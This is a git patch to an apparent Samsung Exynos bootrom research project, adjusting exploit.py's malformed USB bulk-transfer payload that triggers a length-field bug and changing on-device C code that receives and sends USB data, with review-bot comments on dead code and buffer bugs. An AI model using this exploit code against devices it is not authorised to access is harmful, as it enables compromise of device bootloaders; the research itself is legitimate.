From 8c1f008deb015f2b0f2a6307dfa80740af42f79c Mon Sep 17 00:00:00 2001 From: Eljakim Herrewijnen Date: Tue, 23 Jul 2024 23:50:40 +0200 Subject: [PATCH] working usb send --- dwc3.bin | Bin 220 -> 344 bytes dwc3.elf | Bin 7536 -> 7696 bytes dwc3.o | Bin 1488 -> 1744 bytes exploit.py | 7 ++++-- test_dwc3.c | 64 ++++++++++++++++++++++++++++++++++++++++------------ 5 files changed, 54 insertions(+), 17 deletions(-) diff --git a/dwc3.bin b/dwc3.bin index e800078bf9461b6c1bde9b6998bd2b4010f36e95..2a61d9408696d55680a4e3e730477ee2cc924688 100755 GIT binary patch delta 307 zcmcb^c!S9&kbyzui~qirA`I<8f2$c+{&i-U_?ekeE5uYZ9anzwKeS?Ef{ZScLj&BLdZ4-^Q|qTY z0M*q4&3eepunNQmsZj>B?UVpr~e)`Y<|HVOud}eq0aez7g+TZHEE17``m17u; z9h(}1{xSm{70kG@m2KuF6QDTjibbCmi97scVV`+PjX^|<1<0QaWD5gnXBI}y!wn5V z4mAv#512)?76R3|88BEf{cO3kkbz+*V_{R!d?207#IVzW!CvmVc|AR(|n!T=|vV z`Nu>bnFJ-E_}^;Am4BTXCe{Ph?w?ve{W#F93?>Ild0vLX1q=)!3P3fEj1562n(L?k z{QqD4Z?)sf&+JY=4lu`G`&+$#DpU%M0aEXCI{@MeeoBmcGTmg~?03&}; AWB>pF 
diff --git a/dwc3.elf b/dwc3.elf index 61b2b6fef0ae673b2ec9ae5c071908ccc09d93f9..2bf5e44a7ffaa188dbc1c49f2730a770010618f5 100755 GIT binary patch delta 470 zcmexhHNj?r2GazYiCSh{5t0mG5FxoSYnr%EAOnNQ7yo@LMHt$H{#G-t{Oimx@iQ}{ zR*1ubq8T&lr+;Q(FnPf&ti@U5Fj-5~!GeR8;bRvQgXO~i|3fku8iG267%cx*JFfiV ze`v+z1PK{kCWi*NLG?g|N2b>FH3t1<20AO4ab+vp%u6Ofan==!J}nY=_{qXP z^O72ah!zWwKN-jt2GY(fjGBiV8iE{Z7&IR+i)bwbs&g}7uw?q#a%mw0!%oJ+rl9#i zI+=-Krvrn%?lq92L?(xwpMxD&{;fW|0^|UQBlfQZS$y#S|LJ#t_#e=blkZ4em^guD z@*2rAj6RbqrR+HaB$${$AzCo`pp-hNizI|6GWnyFvZxRPBf|lxdGF6B`*BOg=L+YJFvv*K%NJ2%0jZe)4!?wDOC;&OavmNXR580VV!cGp_vW%rLPYsCfU>`sv4khGj50 zSjzJ<6fR(32vGp4ab#==I?-G|{pbJx;(x0hSAJ%9`f-3c{@UN_{VV@6GfaH(|NnFb zhK5TF4D#0=03G$W`rrzX{NxD93zK!E&M+oS{wZb8nIgf&1oC6VWJhUr&OK0`!sJ3} z<;iQLr%m>eX_B>BerPiLLU4}Q$ z5$EZtT4x+}qp|aA#}vmrQ0rWUh{f?Nk%ti{If?Jvc3PAne#jzL9euY)AVH7UJ9U62 zSzSxNMqHrK6p%bno*Wg;-dxIYOZ$x$%O12$Y;Nh3qb~mJc`v`?_uKPK86$0ZNcgag zkLJ+z5dNuMNvO&80A$sO$`*~0TXK||!}riN1QY}r*dzL{M`}9d=;>Xpu4sI&b$x`t z^Y>c+pa<(3XH*)oRIkLeb^&knEf+Fc52GH`T*18N(f{TeGa|LCe?$1|m#*#^9 zjPe2R_bts;&KaNH@aZA>fL)F(K3*8hF0G7Y3&mW%m@VdW%LQ3xo4l~Jy!e98P^igS zZU*n@_%CvmCqo&`)rC8V$~KP$H`qXF$u7T1wq@M7M()d5!=zJGek13l&CiiKuF4Ez LYQHArJLA$H4?d~@ delta 567 zcmZ9IJ4gdT5Qb;=9!U&pe8h{0Mr>j%1VxZw;c39aCPaeR84Dqxg{HAMBnb*eu<)3G zod{awIxPe{wO2SSf~BRcm_VB2+?Z7lr`VbO=KptwwL9(LX}loAZ|L8Z4n9C=bPqS{ zDYW|GXeFaxBW`X<6r|FS<%aOo*cil69 z;tN2u_QoeV#$&bRrV84FTYR<*AMW?op5vTKOp`7F$W+4^qZ_6TF7SRYFt`)CQIS_$ z-KmP`W(8dnc~5Y0g{&y%S}wX~5gaF!wL(ttJ_PXphd~Kgc!!5y zd3eCXVKTqDy)j8Cxr_4hF)7M29#UG-0y(KItJ1DAAAJ4u@V^O@twaK^tPM};Lz%@0 h#nl)tQCij5Gg6ujP*Dlt3I9SZVDmLw;inrl`UN*}a4G-* diff --git a/exploit.py b/exploit.py index 0275fd9..a81e53d 100644 --- a/exploit.py +++ b/exploit.py 
@@ -82,7 +82,7 @@ class ExynosDevice():
 # self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
 transferred = ctypes.c_int()
- bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
+ bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
 bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
 assert res == 0
@@ -91,8 +91,10 @@ class ExynosDevice():
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
 assert res == 0
- payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
+ payload = b"\xaa" * 0x200
 res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
+ while True:
+ res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
 pass
 def test_bug(self):
@@ -278,6 +280,7 @@ if __name__ == "__main__":
 # wait_for_device()
 exynos = ExynosDevice()
 exynos.test_bug_2()
+ sys.exit(0)
 path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
 # path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
 exynos.exploit(open(path, "rb").read())
diff --git a/test_dwc3.c b/test_dwc3.c
index eb14a87..d39f0b2 100644
--- a/test_dwc3.c
+++ b/test_dwc3.c
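Review bot: The new length term `p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7)` in the method that builds `bug_payload` is bare arithmetic with no indication of what the three literals account for, where the removed line at least read as `MAX_PAYLOAD_SIZE + 0x100`. Name the sum once, e.g. `BUG_LENGTH_FIELD = 0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7`, with a comment stating what each term corresponds to, so the next adjustment does not have to rediscover it by trial. The enclosing method starts outside the hunk.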
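Review bot: The `while True:` loop added after the second 0x200-byte transfer has no exit condition and discards `res`, so a transfer that starts failing (the device going away, the 10 ms timeout firing on every iteration) spins silently, and the `pass` that follows it is now unreachable. Either break on a non-zero result, `if res != 0: break`, or give the loop a bounded iteration count, and drop the dead `pass`. The enclosing method starts outside the hunk.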
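Review bot: `sys.exit(0)` placed directly after `exynos.test_bug_2()` turns the rest of the `__main__` block — the `path` assignment and the `exynos.exploit(...)` call — into dead code, which reads like a debugging short-circuit rather than intended flow; if it is meant to stay, gate the code below it on a flag or remove that code instead of leaving it unreachable. The file's import block is not in this hunk, so confirm `sys` is imported; otherwise this line raises `NameError` rather than exiting.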
@@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
 #define recv_buffer 0x02021800 + 0x2000
 #define data_received 0x02021800 + 0x2004
-// do {
-// /* loops until image has been received */
-// usb_event_handler();
-// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
-// } while (iVar2 == 0);
-
 void recv_data_cb(uint32_t endpoint, uint32_t len){
 void *rbuf;
 void *dest_buf = (void *)recv_buffer;
 volatile void *dref = (void *)data_received;
+ rbuf = get_endpoint_buffer(endpoint);
 for(int i= 0; i < len; i++){
- rbuf = get_endpoint_buffer(2);
 *(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
 }
- // while(1){}
- // asm("mov x0, #0x0");
- // asm("br x0");
- *(uint8_t *)dref = 3;
+ *(uint8_t *)dref = 1; // Mark as ready
 }
 void recv_data(){
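Review bot: The copy loop in recv_data_cb still stores every byte at the same address, because `dest_buf` is never advanced, so after the loop only the last byte of the transfer is at `recv_buffer`; `((char *)dest_buf)[i] = ((char *)rbuf)[i];` fixes that and also drops the `(int)rbuf` cast, which truncates a pointer to 32 bits on what the x-register asm elsewhere in this file suggests is an AArch64 target. Once the copy is correct, the layout at the top of the hunk becomes a problem: `data_received` is defined only 4 bytes after `recv_buffer`, so any transfer longer than 4 bytes overwrites the ready flag and the flag writes in turn corrupt the received data; the flag needs an address beyond the end of the 0x200-byte receive area that recv_data sets up. `len` is also never clamped, so a transfer longer than that area overruns whatever follows it — `if (len > 0x200) len = 0x200;` before the loop, or pass the capacity in from recv_data.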
@@ -38,18 +29,61 @@ void recv_data(){
 volatile void *dref = (void *)data_received;
 *(uint8_t *)dref = 0;
- maybe_usb_setup_read(2, recv_data_cb, 1);
+ maybe_usb_setup_read(2, recv_data_cb, 0x200);
+ void *rbuf = get_endpoint_buffer(2);
+ dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
 while(1){
 usb_event_handler();
- if(*(uint8_t *)dref == 3){
+ if(*(uint8_t *)dref == 1){
 break;
 }
- sleep(1, 10);
 }
 }
+void send_data(uint32_t *address, uint32_t size)
+{
+ // asm("stp x29, x30, [sp,#-48]!");;
+ // asm("mov w3, #0x0");
+ // asm("bfxil w3, w1, #0, #24");
+ // asm("mov w1, #0xc12");
+ // asm("mov x29, sp");
+ // asm("stp x19, x20, [sp,#16]");
+ // asm("mov x5, #0xc834");
+ // asm("mov w20, #0x1");
+ // asm("movk x5, #0x1540, lsl #16");
+ // asm("ldr x2, [x29,#40]");
+ // asm("mov x4, #0xc838");
+ // asm("orr w6, w1, w20");
+ // asm("movk x4, #0x1540, lsl #16");
+ // asm("mov x19, #0xc83c");
+ // asm("movk x19, #0x1540, lsl #16");
+ // asm("stp w3, w1, [x2,#8]");
+ // asm("mov w3, #0x406");
+ // asm("stp w0, wzr, [x2]");
+ // asm("mov w0, w20");
+ // asm("ldr x1, [x29,#40]");
+ // asm("strb w6, [x2,#12]");
+ // asm("mov x2, #0x27c8");
+ // asm("str w1, [x5]");
+ // asm("mov w1, #0x1388");
+ // asm("str wzr, [x4]");
+ // asm("str w3, [x19]");
+ // asm("blr x2");
+ // asm("mov w0, w20");
+ // asm("ldr w1, [x19]");
+ // asm("ldp x19, x20, [sp,#16]");
+ // asm("ldp x29, x30, [sp],#48");
+ // asm("ret");
+}
+
 int main()
 {
- recv_data();
+ while(1){
+ recv_data();
+ send_data((uint32_t *) recv_buffer, 0x200);
+ }
+
+
+ // recv_data();
 // sleep(1, 5000);
 asm("mov x0, #0x0");
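Review bot: `send_data((uint32_t *) recv_buffer, 0x200)` in main does not pass the receive buffer: `recv_buffer` expands to `0x02021800 + 0x2000` with no parentheses, so the cast binds to `0x02021800` alone and `+ 0x2000` becomes `uint32_t *` arithmetic, landing 0x8000 bytes past the base (the `(void *)recv_buffer` casts in recv_data_cb give the intended byte offset only through GCC's byte-sized void-pointer arithmetic). Parenthesize both macros in the previous hunk's context lines, `#define recv_buffer (0x02021800 + 0x2000)` and `#define data_received (0x02021800 + 0x2004)`. Separately, the body of send_data is entirely commented out, so as committed it is a no-op and `address`/`size` are unused; if the working send lives in the rebuilt binaries rather than in this source, a `// TODO: stub; the send path is not implemented in this file yet` comment on the function keeps the two from drifting apart silently. The `while(1)` in main also makes the `// recv_data();` block and the asm after it unreachable; main continues past the end of the hunk.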